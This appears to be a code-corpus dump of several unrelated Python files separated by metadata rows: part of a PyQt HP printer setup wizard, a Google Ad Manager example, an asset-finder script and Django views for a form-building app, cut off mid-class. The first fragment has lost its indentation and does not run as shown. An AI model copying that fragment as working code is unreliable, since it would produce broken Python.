self.setTabOrder(self.otherPPDPushButton,self.ppdDefaultsPushButton)
self.setTabOrder(self.ppdDefaultsPushButton,self.defaultPrinterNamePushButton)
self.setTabOrder(self.defaultPrinterNamePushButton,self.defaultFaxNamePushButton)
self.setTabOrder(self.defaultFaxNamePushButton,self.lineEdit4)
self.setTabOrder(self.lineEdit4,self.lineEdit3)
self.setTabOrder(self.lineEdit3,self.lineEdit2)
self.setTabOrder(self.lineEdit2,self.lineEdit1)
self.setTabOrder(self.lineEdit1,self.printTestPageCheckBox)
self.setTabOrder(self.printTestPageCheckBox,self.lineEdit5)
self.setTabOrder(self.lineEdit5,self.lineEdit6)
self.setTabOrder(self.lineEdit6,self.lineEdit7)
self.setTabOrder(self.lineEdit7,self.lineEdit8)
self.setTabOrder(self.lineEdit8,self.lineEdit9)
def languageChange(self):
        self.setCaption(self.__tr("HP Device Manager - Printer Setup Wizard"))
self.connectionTypeButtonGroup.setTitle(self.__tr("Connection (I/O) Type"))
self.usbRadioButton.setText(self.__tr("Universal Serial Bus (USB)"))
self.netRadioButton.setText(self.__tr("Network/Ethernet/Wireless (direct connection or JetDirect)"))
self.parRadioButton.setText(self.__tr("Parallel Port (LPT)"))
self.searchFiltersPushButton2.setText(self.__tr("Advanced..."))
self.setTitle(self.ConnectionPage,self.__tr("Choose Connection Type"))
self.searchFiltersPushButton.setText(self.__tr("Advanced..."))
self.probeHeadingTextLabel.setText(self.__tr("probeHeadingTextLabel"))
self.manualFindPushButton.setText(self.__tr("Find Manually..."))
self.probeUpdatePushButton.setText(self.__tr("Refresh"))
self.setTitle(self.ProbedDevicesPage,self.__tr("Select from Discovered Devices"))
self.ppdListView.header().setLabel(0,self.__tr("PPD File"))
self.ppdListView.header().setLabel(1,self.__tr("Description"))
self.otherPPDPushButton.setText(self.__tr("Select Other..."))
self.ppdDefaultsPushButton.setText(self.__tr("Defaults"))
self.textLabel1_5.setText(self.__tr("Please choose the PPD file (by name and description) that most closely matches your printer. <i>Note: The model name of the printer may vary somewhat from the PPD file name, for example, a Deskjet 5550 may have a PPD file with the model name of Deskjet_5500_series.</i>"))
self.setTitle(self.PPDPage,self.__tr("Select/Confirm PPD File"))
self.groupBox4.setTitle(self.__tr("Printer Information"))
self.defaultPrinterNamePushButton.setText(self.__tr("Default"))
self.textLabel1_2.setText(self.__tr("Location:"))
self.textLabel1.setText(self.__tr("Printer Name:"))
self.textLabel2.setText(self.__tr("Description:"))
self.faxInfoGroupBox.setTitle(self.__tr("Fax Information"))
self.textLabel1_3.setText(self.__tr("Fax Name:"))
self.textLabel3.setText(self.__tr("Name/Company:"))
self.textLabel2_2.setText(self.__tr("Fax Number:"))
self.faxCheckBox.setText(self.__tr("Setup PC send fax"))
self.defaultFaxNamePushButton.setText(self.__tr("Default"))
self.textLabel1_2_2.setText(self.__tr("Location:"))
self.textLabel2_4.setText(self.__tr("Description:"))
self.textLabel1_4.setText(self.__tr("Click \"Next >\" to install the printer on your system."))
self.setTitle(self.PrinterNamePage,self.__tr("Enter Printer Information"))
self.printTestPageCheckBox.setText(self.__tr("Send test page to printer"))
self.faxGroupBox.setTitle(self.__tr("Fax Summary"))
self.textLabel7.setText(self.__tr("Fax Number:"))
self.textLabel6.setText(self.__tr("Fax Name:"))
self.textLabel8.setText(self.__tr("Name/Company:"))
self.textLabel8_2.setText(self.__tr("Location:"))
self.textLabel8_3.setText(self.__tr("Description:"))
self.groupBox3.setTitle(self.__tr("Printer Summary"))
self.textLabel4.setText(self.__tr("Description:"))
self.textLabel3_2.setText(self.__tr("Location:"))
self.textLabel2_3.setText(self.__tr("Printer Name:"))
self.textLabel5.setText(self.__tr("PPD File:"))
self.textLabel2_5.setText(self.__tr("The printer has been successfully installed on your system."))
self.setTitle(self.FinishedPage,self.__tr("Finished Adding Printer"))
def connectionTypeButtonGroup_clicked(self,a0):
print("SetupForm_base.connectionTypeButtonGroup_clicked(int): Not implemented yet")
def probedDevicesListView_currentChanged(self,a0):
print("SetupForm_base.probedDevicesListView_currentChanged(QListViewItem*): Not implemented yet")
def printerNameLineEdit_textChanged(self,a0):
print("SetupForm_base.printerNameLineEdit_textChanged(const QString&): Not implemented yet")
def defaultPrinterNamePushButton_clicked(self):
print("SetupForm_base.defaultPrinterNamePushButton_clicked(): Not implemented yet")
def ppdBrowsePushButton_clicked(self):
print("SetupForm_base.ppdBrowsePushButton_clicked(): Not implemented yet")
def ppdFileLineEdit_textChanged(self,a0):
print("SetupForm_base.ppdFileLineEdit_textChanged(const QString&): Not implemented yet")
def ppdListView_currentChanged(self,a0):
print("SetupForm_base.ppdListView_currentChanged(QListViewItem*): Not implemented yet")
def probeUpdatePushButton_clicked(self):
print("SetupForm_base.probeUpdatePushButton_clicked(): Not implemented yet")
def searchFiltersPushButton_clicked(self):
print("SetupForm_base.searchFiltersPushButton_clicked(): Not implemented yet")
def searchFiltersPushButton2_clicked(self):
print("SetupForm_base.searchFiltersPushButton2_clicked(): Not implemented yet")
def manualFindPushButton_clicked(self):
print("SetupForm_base.manualFindPushButton_clicked(): Not implemented yet")
def printerLocationLineEdit_textChanged(self,a0):
print("SetupForm_base.printerLocationLineEdit_textChanged(const QString&): Not implemented yet")
def printerDescriptionLineEdit_textChanged(self,a0):
print("SetupForm_base.printerDescriptionLineEdit_textChanged(const QString&): Not implemented yet")
def faxNameLineEdit_textChanged(self,a0):
print("SetupForm_base.faxNameLineEdit_textChanged(const QString&): Not implemented yet")
def faxNumberLineEdit_textChanged(self,a0):
print("SetupForm_base.faxNumberLineEdit_textChanged(const QString&): Not implemented yet")
def faxNameCoLineEdit_textChanged(self,a0):
print("SetupForm_base.faxNameCoLineEdit_textChanged(const QString&): Not implemented yet")
def printTestPageCheckBox_clicked(self):
print("SetupForm_base.printTestPageCheckBox_clicked(): Not implemented yet")
def faxCheckBox_clicked(self):
print("SetupForm_base.faxCheckBox_clicked(): Not implemented yet")
def faxCheckBox_toggled(self,a0):
print("SetupForm_base.faxCheckBox_toggled(bool): Not implemented yet")
def printTestPageCheckBox_toggled(self,a0):
print("SetupForm_base.printTestPageCheckBox_toggled(bool): Not implemented yet")
def defaultFaxNamePushButton_clicked(self):
print("SetupForm_base.defaultFaxNamePushButton_clicked(): Not implemented yet")
def otherPPDPushButton_clicked(self):
print("SetupForm_base.otherPPDPushButton_clicked(): Not implemented yet")
def ppdDefaultsPushButton_clicked(self):
print("SetupForm_base.ppdDefaultsPushButton_clicked(): Not implemented yet")
def faxLocationLineEdit_textChanged(self,a0):
print("SetupForm_base.faxLocationLineEdit_textChanged(const QString&): Not implemented yet")
def faxDescriptionLineEdit_textChanged(self,a0):
print("SetupForm_base.faxDescriptionLineEdit_textChanged(const QString&): Not implemented yet")
def __tr(self,s,c = None):
return qApp.translate("SetupForm_base",s,c)
|
gpl-2.0
| 80,808,447,214,767,820 | 47.781481 | 317 | 0.738289 | false |
Aloomaio/googleads-python-lib
|
examples/ad_manager/v201811/native_style_service/get_all_native_styles.py
|
1
|
1863
|
#!/usr/bin/env python
#
# Copyright 2017 Google Inc. All Rights Reserved.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
"""This example gets all native styles."""
# Import appropriate modules from the client library.
from googleads import ad_manager
def main(client):
# Initialize appropriate service.
native_style_service = client.GetService('NativeStyleService',
version='v201811')
# Create a statement to select native styles.
statement = ad_manager.StatementBuilder(version='v201811')
# Retrieve a small amount of native styles at a time, paging
# through until all native styles have been retrieved.
while True:
response = native_style_service.getNativeStylesByStatement(
statement.ToStatement())
if 'results' in response and len(response['results']):
for native_style in response['results']:
# Print out some information for each native style.
print('Native style with ID "%d" and name "%s" was found.\n' %
(native_style['id'], native_style['name']))
statement.offset += statement.limit
else:
break
  print('\nNumber of results found: %s' % response['totalResultSetSize'])
if __name__ == '__main__':
# Initialize client object.
ad_manager_client = ad_manager.AdManagerClient.LoadFromStorage()
main(ad_manager_client)
|
apache-2.0
| -857,157,496,255,707,500 | 35.529412 | 74 | 0.703704 | false |
tundish/blue_monday_78
|
bluemonday78/utils/publisher.py
|
1
|
3924
|
#!/usr/bin/env python3
# encoding: UTF-8
# This file is part of Addison Arches.
#
# Addison Arches is free software: you can redistribute it and/or modify it
# under the terms of the GNU Affero General Public License as published
# by the Free Software Foundation, either version 3 of the License, or
# (at your option) any later version.
#
# Addison Arches is distributed in the hope that it will be useful, but
# WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
# GNU Affero General Public License for more details.
#
# You should have received a copy of the GNU Affero General Public License
# along with Addison Arches. If not, see <http://www.gnu.org/licenses/>.
import argparse
from collections import defaultdict
from collections import namedtuple
import glob
import os.path
import pathlib
import platform
import pprint
import sys
import uuid
__doc__ = """
Identify assets related to SceneScript folders.
NB: In order to reference a story arc from a different pathway, do `ln -s`, eg::
ln -rs -t bluemonday78/dialogue/w12_ducane/prison_wing \
bluemonday78/dialogue/w12_ducane/prison_office/release
This creates a relative soft link in `prison_wing` which will point to
`prison_office/release`.
"""
Assets = namedtuple("Assets", ["id", "pathways", "arc", "scripts"])
def find_scripts(path):
for id_location in glob.glob(os.path.join(path, "**/uuid.hex"), recursive=True):
try:
id_path = pathlib.Path(id_location)
uid = uuid.UUID(hex=id_path.read_text().strip())
except (ValueError, OSError):
print("Bad uuid at '", id_path, "'.", sep="", file=sys.stderr)
continue
else:
for script_path in sorted(id_path.parent.glob("*.rst")):
yield uid, script_path
def find_assets(path, prefix=""):
locations = defaultdict(list)
for uid, script_path in find_scripts(path):
locations[uid].append(script_path)
for uid, script_paths in locations.items():
arc_name = None
pathways = set()
scripts = set()
for script_path in script_paths:
arc_path = script_path.parent
pathways.add(arc_path.parent.relative_to(path).parts)
if not arc_path.is_symlink():
arc_name = arc_path.name
arc_name = ".".join((
prefix, str(arc_path.relative_to(path)).replace(os.sep, ".")
))
scripts.add(script_path.relative_to(path))
if "windows" in platform.system().lower():
# Find soft links explicitly because MS OS fails to do it
# within the source repository
links = set([
(pathlib.Path(f).parent, pathlib.Path(f).read_text())
for script in script_paths
for f in glob.glob(os.path.join(
path, "{0}/{1}".format("**", script.parent.name)),
recursive=True)
if pathlib.Path(f).is_file() and
0 < pathlib.Path(f).stat().st_size < 128
])
for parent, hop in links:
if parent.joinpath(hop).resolve() == arc_path.resolve():
pathways.add(parent.relative_to(path).parts)
yield Assets(
uid, frozenset(pathways),
arc_name, tuple(sorted(scripts))
)
def main(args):
assets = [i for path in args.paths for i in find_assets(path)]
pprint.pprint(assets)
def parser(description=__doc__):
rv = argparse.ArgumentParser(
description,
fromfile_prefix_chars="@"
)
rv.add_argument(
"paths", nargs="*", type=pathlib.Path,
help="supply a list of directory paths"
)
return rv
if __name__ == "__main__":
p = parser()
args = p.parse_args()
rv = main(args)
sys.exit(rv)
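# Example invocation (added; the dialogue path is illustrative):
#   python -m bluemonday78.utils.publisher bluemonday78/dialogue
# pretty-prints the Assets tuples (uuid, pathways, arc, scripts) discovered
# beneath each supplied directory.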
|
agpl-3.0
| 8,140,897,638,692,505,000 | 31.429752 | 84 | 0.612385 | false |
ofilipowicz/owndb
|
store/views.py
|
1
|
34136
|
from django.contrib.auth.models import User
from django.views.generic import ListView, DetailView, View, CreateView, DeleteView
from django.views.generic.base import TemplateView
from django.db.models import Q
from django.core.urlresolvers import reverse, reverse_lazy
from django.contrib.auth.decorators import login_required
from django.contrib import messages
from django.http import HttpRequest, HttpResponse, HttpResponseRedirect, JsonResponse, Http404
from django.template.response import TemplateResponse as TR
from django.template import RequestContext
from django.template.defaultfilters import slugify
from django.utils.decorators import method_decorator
from django.utils.translation import ugettext as _
from django.shortcuts import render, get_object_or_404, redirect
from allauth.account.decorators import verified_email_required
from friendship.models import Friend, Follow
from store.forms import FormShareForm # Check if guest is a logged user
from store import models
from datetime import datetime
import re, json
class VerifiedMixin(object):
@method_decorator(verified_email_required)
def dispatch(self, *args, **kwargs):
return super(VerifiedMixin, self).dispatch(*args, **kwargs)
class FormAdd(VerifiedMixin, TemplateView):
template_name = 'store/form_add.html'
def get(self, request, *args, **kwargs):
project = get_object_or_404(models.Project, pk=self.kwargs['project'])
if project.owner == request.user:
return super(FormAdd, self).get(request, *args, **kwargs)
else:
messages.error(request, _("You are not allowed to add form."))
raise Http404()
def get_context_data(self, **kwargs):
context = super(FormAdd, self).get_context_data(**kwargs)
context['project'] = models.Project.objects.get(pk=self.kwargs['project'])
return context
def post(self, request, *args, **kwargs):
context = self.get_context_data()
print(request.POST)
print(request.FILES)
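        # Added note: the first branch answers the designer's AJAX lookups for the
        # "Connection" field type - first the list of forms in the project, then
        # the checkable fields of the chosen form; everything below the else
        # creates the form itself from the posted field definitions.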
if request.POST.get('connection') == "forms":
if request.POST.get('form'):
fields = "<ul>"
for field in models.FormField.objects.filter(form=request.POST.get('form')).exclude(type__pk__in=[6,8,9,10]).order_by('position'):
fields += '<li><input type="checkbox" class="spec_field" name="'+str(field.pk)+'" /> <span>' + field.caption + '</span></li>'
return HttpResponse(fields + "</ul>")
forms = ""
for form in models.Form.objects.filter(project=self.kwargs['project']):
forms += '<option value="' + str(form.pk) + '">' + form.title + '</option>'
return HttpResponse(forms)
else:
form_title = request.POST.get('title')
if form_title.isspace() or form_title=='':
return HttpResponse(_("Form name is invalid!"))
names = json.loads(request.POST.get('names'))
types = json.loads(request.POST.get('types'))
settings = json.loads(request.POST.get('settings'))
c = 0
for type in types:
if type == "LabelImage":
c = c + 1
if c > 0:
if request.FILES:
if len(request.FILES) < c:
return HttpResponse(_("You should provide all images for labels."))
else:
return HttpResponse(_("You should provide image for label."))
p = models.Project.objects.get(pk=self.kwargs['project'])
f = models.Form(
title=form_title,
project=p,
slug = slugify(form_title)
)
f.save()
try:
i = 0
for name in names:
t = models.Type.objects.get(name=types[i])
s = settings[i]
ff = models.FormField(
form=f,
type=t,
caption=name,
settings=s,
position=i
)
ff.save()
if (t.name == "LabelText"):
data = models.DataText(
formfield = ff,
data = s
)
data.save()
elif (t.name == "LabelImage"):
imgname = "labelimage" + str(i)
img = models.Image(
formfield=ff,
image=request.FILES[imgname]
)
img.save()
elif (t.name == "Connection"):
d = s.split(';')
cf = models.Form.objects.get(pk=d[0])
c = models.Connection(
formfield = ff,
form = cf
)
c.save()
i += 1
except:
f.delete()
return HttpResponse(_("Error occurred while creating form!"))
messages.success(request, _("Form successfully added!"))
return HttpResponse("OK")
class FormEdit(VerifiedMixin, TemplateView):
template_name = 'store/form_edit.html'
def get(self, request, *args, **kwargs):
form = get_object_or_404(models.Form, pk=self.kwargs['form'])
if form.project.owner == self.request.user and not models.FormInstance.objects.filter(form__pk=self.kwargs['form']).exists():
return super(FormEdit, self).get(request, *args, **kwargs)
else:
messages.error(request, _("You cannot edit this form."))
raise Http404()
def get_context_data(self, **kwargs):
context = super(FormEdit, self).get_context_data(**kwargs)
context['project'] = models.Project.objects.get(pk=self.kwargs['project'])
context['form'] = models.Form.objects.get(pk=self.kwargs['form'])
fields = models.FormField.objects.filter(form=self.kwargs['form']).order_by('position')
for field in fields:
if field.type.pk == 7:
v = field.settings.split(';')
fpk = v[0]
field.fpk = fpk
con = models.Form.objects.get(pk=fpk)
field.conname = con.title
del v[0]
field.visibles = models.FormField.objects.filter(form=fpk).exclude(type__pk__in=[6,8,9,10]).order_by('pk')
for vis in field.visibles:
if str(vis.pk) in v:
vis.checked = True
context['fields'] = fields
return context
def post(self, request, *args, **kwargs):
context = self.get_context_data()
print(request.POST)
print(request.FILES)
if request.POST.get('connection') == "forms":
if request.POST.get('form'):
fields = "<ul>"
for field in models.FormField.objects.filter(form=request.POST.get('form')).exclude(type__pk__in=[6,8,9,10]).order_by('position'):
fields += '<li><input type="checkbox" class="spec_field" name="'+str(field.pk)+'" /> <span>' + field.caption + '</span></li>'
return HttpResponse(fields + "</ul>")
forms = ""
for form in models.Form.objects.filter(project=self.kwargs['project']):
forms += '<option value="' + str(form.pk) + '">' + form.title + '</option>'
return HttpResponse(forms)
else:
form_title = request.POST.get('title')
if form_title.isspace() or form_title=='':
return HttpResponse(_("Form name is invalid!"))
names = json.loads(request.POST.get('names'))
types = json.loads(request.POST.get('types'))
settings = json.loads(request.POST.get('settings'))
c = 0
for type in types:
if type == "LabelImage":
c = c + 1
if c > 0:
if request.FILES:
if len(request.FILES) < c:
return HttpResponse(_("You should provide all images for labels."))
else:
return HttpResponse(_("You should provide image for label."))
f = models.Form.objects.get(pk=self.kwargs['form'])
f.title = form_title
f.slug = slugify(form_title)
f.save()
models.FormInstance.objects.filter(form=f).delete()
models.FormField.objects.filter(form=f).delete()
try:
i = 0
for name in names:
t = models.Type.objects.get(name=types[i])
s = settings[i]
ff = models.FormField(
form=f,
type=t,
caption=name,
settings=s,
position=i
)
ff.save()
if t.name == "LabelText":
data = models.DataText(
formfield = ff,
data = s
)
data.save()
elif t.name == "LabelImage":
imgname = "labelimage" + str(i)
img = models.Image(
formfield=ff,
image=request.FILES[imgname]
)
img.save()
elif t.name == "Connection":
d = s.split(';')
cf = models.Form.objects.get(pk=d[0])
c = models.Connection(
formfield = ff,
form = cf
)
c.save()
i += 1
for c in models.Connection.objects.filter(form=f):
models.FormField.objects.filter(pk=c.formfield.pk).delete()
except:
f.delete()
return HttpResponse(_("Error occurred while saving changes!"))
messages.success(request, _("Form updated successfully!"))
return HttpResponse("OK")
class FormInstanceAdd(VerifiedMixin, TemplateView):
template_name = 'store/forminstance_add.html'
def get(self, request, *args, **kwargs):
form = get_object_or_404(models.Form, pk=self.kwargs['form'])
sharing = models.Sharing.objects.filter(owner=self.request.user).filter(form=form)
if form.project.owner == self.request.user or sharing:
return super(FormInstanceAdd, self).get(request, *args, **kwargs)
else:
messages.error(request, _("You are not allowed to add instances to this form."))
raise Http404()
def get_context_data(self, **kwargs):
context = super(FormInstanceAdd, self).get_context_data(**kwargs)
context['project'] = models.Project.objects.get(pk=self.kwargs['project'])
context['form'] = models.Form.objects.get(pk=self.kwargs['form'])
fields = models.FormField.objects.filter(form=self.kwargs['form']).order_by('position')
for field in fields:
if models.Image.objects.filter(formfield=field, forminstance__isnull=True).exists():
field.labelimage = models.Image.objects.get(formfield=field, forminstance__isnull=True)
elif field.type.pk == 7:
field.fpk = field.settings.split(';')[0]
context['fields'] = fields
return context
def post(self, request, *args, **kwargs):
context = self.get_context_data()
print(request.POST)
print(request.FILES)
if request.POST.get('connection') == "instances":
visibles = models.FormField.objects.get(pk=request.POST.get('formfield')).settings.split(';')
del visibles[0]
fpk = request.POST.get('form')
forms = '<div class="table-responsive"><table class="instances table table-hover"><thead><tr>'
for field in models.FormField.objects.filter(form=fpk).order_by('position'):
if (str(field.pk) in visibles and field.type.pk != 5 and field.type.pk != 8 and field.type.pk != 9 and field.type.pk != 10):
forms += '<th>'+ field.caption +'</th>'
forms += "</tr></thead><tbody>"
i = 0
for instance in models.FormInstance.objects.filter(form=models.Form.objects.get(pk=fpk)).order_by('-pk'):
forms += '<tr class="cmodal-select" name="'+str(instance.pk)+'">'
for field in models.FormField.objects.filter(form=fpk).order_by('position'):
if (str(field.pk) in visibles and field.type.pk != 8 and field.type.pk != 9 and field.type.pk != 10):
if field.type.pk == 7:
insd = models.ConnectionInstance.objects.get(connection__formfield = field, forminstance = instance)
elif field.type.pk == 6:
insd = models.File.objects.get(formfield = field, forminstance = instance)
elif field.type.pk == 5:
insd = models.Image.objects.get(formfield = field, forminstance = instance)
else:
insd = models.DataText.objects.get(formfield = field, forminstance = instance)
forms += '<td>' + insd.display() + '</td>'
forms += '</tr>'
i += 1
forms += '</tbody></table></div>'
if i==0:
forms = _('Connected form is empty! There is no data to show.')
return HttpResponse(forms)
else:
fields = models.FormField.objects.filter(form=self.kwargs['form']).order_by('position')
contents = json.loads(request.POST.get('contents'))
i = 0
c = 0
for field in fields:
if field.type.pk == 6 or field.type.pk == 5:
c = c + 1
elif field.type.pk == 7:
if contents[i] == '':
return HttpResponse(_("You have to choose all instances!"))
i += 1
if c > 0:
if request.FILES:
if len(request.FILES) < c:
return HttpResponse(_("You should choose all images or files."))
else:
return HttpResponse(_("You should choose image or file."))
f = models.Form.objects.get(pk=self.kwargs['form'])
fi = models.FormInstance(
form = f,
user = self.request.user
)
if fi.form.project.owner != self.request.user:
fi.approved = False
fi.save()
i = 0
for field in fields:
if (field.type.pk != 8 and field.type.pk != 9 and field.type.pk != 10):
if field.type.pk == 7:
if contents[i] != '':
con = models.Connection.objects.get(formfield=field)
chfi = models.FormInstance.objects.get(pk=contents[i])
ins = models.ConnectionInstance(
connection=con,
forminstance = fi,
choseninstance = chfi
)
ins.save()
elif field.type.pk == 6:
filename = "file" + str(i)
file = models.File(
formfield=field,
forminstance = fi,
file=request.FILES[filename]
)
file.save()
elif field.type.pk == 5:
imgname = "image" + str(i)
img = models.Image(
formfield=field,
forminstance = fi,
image=request.FILES[imgname]
)
img.save()
else:
data = models.DataText(
formfield = field,
forminstance = fi,
data = contents[i]
)
data.save()
i += 1
messages.success(request, _("Form instance added successfully!"))
return HttpResponse("OK")
class ProjectList(VerifiedMixin, ListView):
model = models.Project
paginate_by = 4
context_object_name = 'project_list'
def get_queryset(self):
q = self.request.GET.get('search')
if q:
ret = self.model.objects.filter(owner__pk=self.request.user.pk, title__icontains=q)
if not ret.exists():
messages.error(self.request, _("Projects with \"") + q + _("\" were not found!"))
else:
messages.success(self.request, _("List of projects with \"") + q + _("\" term."))
return ret
return self.model.objects.filter(owner__pk=self.request.user.pk).order_by('-pk')
def get_context_data(self, **kwargs):
context = super(ProjectList, self).get_context_data(**kwargs)
return context
class FormList(VerifiedMixin, ListView):
model = models.Form
paginate_by = 4
context_object_name = 'form_list'
def get(self, request, *args, **kwargs):
project = get_object_or_404(models.Project, pk=self.kwargs['project'])
if project.owner == request.user:
return super(FormList, self).get(request, *args, **kwargs)
else:
messages.error(request, _("You are not allowed to see this forms list because you are not an owner."))
raise Http404()
def get_queryset(self):
q = self.request.GET.get('search')
if q:
ret = self.model.objects.filter(project__pk=self.kwargs['project'], title__icontains=q)
if not ret.exists():
messages.error(self.request, _("Forms with \"") + q + _("\" were not found!"))
else:
messages.success(self.request, _("List of forms with \"") + q + _("\" term."))
return ret
return self.model.objects.filter(project__pk=self.kwargs['project']).order_by('-pk')
def get_context_data(self, **kwargs):
context = super(FormList, self).get_context_data(**kwargs)
context['project'] = models.Project.objects.get(pk=self.kwargs['project'])
return context
class SharingSomeones(VerifiedMixin, ListView):
model = models.Sharing
paginate_by = 2
context_object_name = 'sharedform_list'
template_name = 'store/sharing_someones.html'
def get_queryset(self):
return self.request.user.sharing_set.all()
class SharingMy(VerifiedMixin, ListView):
model = models.Sharing
paginate_by = 2
context_object_name = 'sharedform_list'
template_name = 'store/sharing_my.html'
def get_queryset(self):
return self.model.objects.filter(form__project__owner=self.request.user)
class SharingDelete(VerifiedMixin, DeleteView):
model = models.Sharing
slug_field = 'id'
slug_url_kwarg = 'shared_form'
success_url = reverse_lazy('project-list')
def get_success_url(self):
messages.success(self.request, _('Shared form successfully deleted!'))
return super(SharingDelete, self).get_success_url()
class FormInstanceList(VerifiedMixin, ListView):
model = models.FormInstance
paginate_by = 4
context_object_name = 'forminstance_list'
def get(self, request, *args, **kwargs):
form = get_object_or_404(models.Form, pk=self.kwargs['form'])
sharing = models.Sharing.objects.filter(owner=self.request.user).filter(
form=form)
if form.project.owner == self.request.user or sharing:
return super(FormInstanceList, self).get(request, *args, **kwargs)
else:
messages.error(request, _("You are not allowed to add instances to this form."))
raise Http404()
def get_queryset(self):
q = self.request.GET.get('search')
if q:
datalist = models.DataText.objects.filter(formfield__form__pk=self.kwargs['form'], forminstance__isnull=False, data__icontains=q)
instanceslist = []
for i in datalist:
instanceslist.append(i.forminstance.pk)
ret = self.model.objects.filter(Q(form__pk=self.kwargs['form']), Q(approved=True), Q(pk__in=instanceslist) | Q(date__icontains=q) | Q(user__username__icontains=q)).order_by('-pk')
if not ret.exists():
messages.error(self.request, _("Instances with \"") + q + _("\" were not found!"))
else:
messages.success(self.request, _("List of instances with \"") + q + _("\" term."))
return ret
return self.model.objects.filter(form__pk=self.kwargs['form'], approved=True).order_by('-pk')
def get_context_data(self, **kwargs):
context = super(FormInstanceList, self).get_context_data(**kwargs)
context['project'] = models.Project.objects.get(pk=self.kwargs['project'])
context['form'] = models.Form.objects.get(pk=self.kwargs['form'])
context['fields'] = models.FormField.objects.filter(form__pk=self.kwargs['form']).exclude(type__pk__in=[7,8,9,10]).order_by('position')
return context
class Dashboard(VerifiedMixin, ListView):
model = models.FormInstance
paginate_by = 10
context_object_name = 'instances'
template_name = 'store/dashboard.html'
def get_queryset(self):
return self.model.objects.filter(
form__project__owner=self.request.user,
approved=False)
@verified_email_required
def approve_instance(request, forminstance):
instance_obj = get_object_or_404(models.FormInstance, pk=forminstance)
if instance_obj.form.project.owner == request.user:
instance_obj.approved = True
instance_obj.save()
messages.success(request, _('Form instance approved'))
return HttpResponseRedirect(reverse_lazy('dashboard'))
else:
messages.error(request, _("You are not allowed to approve this instance."))
raise Http404()
class DeleteInstance(VerifiedMixin, DeleteView):
model = models.FormInstance
slug_field = 'id'
slug_url_kwarg = 'forminstance'
success_url = reverse_lazy('dashboard')
def get_success_url(self):
messages.success(self.request, _('Form instance deleted'))
return super(DeleteInstance, self).get_success_url()
class FormInstanceDetail(VerifiedMixin, DetailView):
model = models.FormInstance
context_object_name = 'forminstance'
slug_field = 'id'
slug_url_kwarg = 'forminstance'
def get(self, request, *args, **kwargs):
form = get_object_or_404(models.Form, pk=self.kwargs['form'])
if form.project.owner == self.request.user or self.get_object().user == self.request.user:
return super(FormInstanceDetail, self).get(request, *args, **kwargs)
else:
messages.error(request, _("You can't view this instance details because it wasn't added by you."))
raise Http404()
def get_context_data(self, **kwargs):
context = super(FormInstanceDetail, self).get_context_data(**kwargs)
context['project'] = models.Project.objects.get(pk=self.kwargs['project'])
context['form'] = models.Form.objects.get(pk=self.kwargs['form'])
formfield_list = models.FormField.objects.filter(form__pk=self.kwargs['form']).exclude(Q(type=10)).order_by('position')
for field in formfield_list:
if field.type.pk == 3 or field.type.pk == 4:
t = field.settings.split(';')
c = models.DataText.objects.get(formfield=field, forminstance=self.kwargs['forminstance']).data.split(';')
del t[0]
del c[0]
field.options = zip(t,c)
elif field.type.pk == 7:
field.fpk = field.settings.split(';')[0]
context['formfield_list'] = formfield_list
context['instances_count'] = models.FormInstance.objects.filter(form__pk=self.kwargs['form']).count()
return context
def post(self, request, *args, **kwargs):
form = get_object_or_404(models.Form, pk=self.kwargs['form'])
if not form.project.owner == self.request.user:
return HttpResponse(_("You can't update instances of this form because you are not an owner."))
print(request.POST)
print(request.FILES)
fields = models.FormField.objects.filter(form=self.kwargs['form']).order_by('position')
contents = json.loads(request.POST.get('contents'))
i = 0
for field in fields:
if (field.type.pk != 8 and field.type.pk != 9 and field.type.pk != 10):
if field.type.pk == 7:
if contents[i] != '':
chfi = models.FormInstance.objects.get(pk=contents[i])
con = models.ConnectionInstance.objects.get(connection__formfield=field, forminstance=self.kwargs['forminstance'])
con.choseninstance = chfi
con.save()
elif field.type.pk == 6:
filename = "file" + str(i)
if request.FILES.get(filename):
f = models.File.objects.get(formfield=field, forminstance=self.kwargs['forminstance'])
f.file.delete(save=False)
f.file=request.FILES[filename]
f.save()
elif field.type.pk == 5:
imgname = "image" + str(i)
if request.FILES.get(imgname):
f = models.Image.objects.get(formfield=field, forminstance=self.kwargs['forminstance'])
f.image.delete(save=False)
f.image=request.FILES[imgname]
f.save()
else:
f = models.DataText.objects.get(formfield=field, forminstance=self.kwargs['forminstance'])
f.data = contents[i]
f.save()
i += 1
messages.success(request, _("Instance successfully updated!"))
return HttpResponse("OK")
class FormInstanceDelete(VerifiedMixin, TemplateView):
template_name = 'store/forminstance_delete.html'
def get_context_data(self, **kwargs):
context = super(FormInstanceDelete, self).get_context_data(**kwargs)
context['project'] = models.Project.objects.get(pk=self.kwargs['project'])
context['form'] = models.Form.objects.get(pk=self.kwargs['form'])
context['forminstance'] = models.FormInstance.objects.get(pk=self.kwargs['forminstance'])
context['dependent_count'] = models.ConnectionInstance.objects.filter(choseninstance__pk=self.kwargs['forminstance']).count()
return context
def post(self, request, *args, **kwargs):
context = self.get_context_data()
try:
models.FormInstance.objects.filter(form__pk=self.kwargs['form'], pk=self.kwargs['forminstance']).delete()
messages.success(request, _("Form instance successfully deleted!"))
except:
messages.error(request, _("Error occurred while deleting form instance!"))
return HttpResponseRedirect(reverse('forminstance-list', kwargs={'project': self.kwargs['project'], 'form': self.kwargs['form'] } ))
class ProjectAdd(VerifiedMixin, TemplateView):
template_name = 'store/project_add.html'
def get_context_data(self, **kwargs):
context = super(ProjectAdd, self).get_context_data(**kwargs)
return context
def post(self, request, *args, **kwargs):
context = self.get_context_data()
name = self.request.POST.get('project_name')
if name.isspace() or name=='':
messages.error(request, _("Bad project name!"))
return HttpResponseRedirect(reverse('project-add'))
p = models.Project(
title=name,
owner=self.request.user,
slug=slugify(name)
)
p.save()
messages.success(request, _("Project successfully added!"))
return HttpResponseRedirect(reverse('form-list', kwargs={'project': p.pk} ))
class ProjectEdit(VerifiedMixin, TemplateView):
template_name = 'store/project_edit.html'
def get(self, request, *args, **kwargs):
project = get_object_or_404(models.Project, pk=self.kwargs['project'])
if project.owner == request.user:
return super(ProjectEdit, self).get(request, *args, **kwargs)
else:
